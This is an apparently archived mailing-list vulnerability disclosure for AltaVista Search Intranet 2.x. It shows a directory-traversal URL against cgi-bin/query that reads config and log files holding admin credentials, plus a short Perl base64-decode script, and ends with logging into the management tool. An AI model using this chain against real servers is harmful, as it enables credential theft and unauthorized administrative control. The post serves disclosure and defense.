good morning folks, ... "With AltaVista Search Software, you can create your own search and retrieval Web site with the same relevancy, performance, and efficiency of the powerful AltaVista Search engine (www.altavista.com) used to index the World Wide Web" ... yes thats true .. but, if you take a closer look on its functionallity and file-scructure you will find some interesting things: the template-variable: {mss} in the main search function (cgi-bin/query?) allows you one traversal step back and shows you any file in the "http - directory". example: http://we.loverudi.org:9000/cgi-bin/query?../config if you try to go more then one directory back the program escapes {mss} with "@../" ... nice try .. but much to late .. the http directory contains some very interesting files: ../config ( Var "MGMT_PW=[ Plaintext MGMT-password ]" ) ../logs/mgtstate ( passw=[ encoded mgt-password ] .. NOT the MGMT-password !!!) ../logs/stats.log ( sometimes stats_log ) ../logs/access.log ( sometimes access_log ) forget everything but the "mgtstate" file .. it contains the username:password for the online-config tool ( http://we.loverudi.org:9000/cgi-bin/mgt ) in the form: passw=[ encoded user:password string ] pfft .. these guys are really smart .. the encode their passwords ... ( base64 :) now we need a prg/script to decode the user/password - string ---cut here--- #!/usr/bin/perl use MIME::Base64; print decode_base64("$ARGV[0]"), "\n"; ---cut here--- thank you ... then start(goto) the online config tool ( http://we.loverudi.org:9000/cgi-bin/mgt ) and do whatever you want ... aso aso aso have a nice Y2K-BUG rudicarellat_private other infos: vulnerable: altavista search intranet 2.?? type: Input Validation Error object: query? remote: yes vendor: altavista .. got informed ~3 month ago) ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:24:16 PDT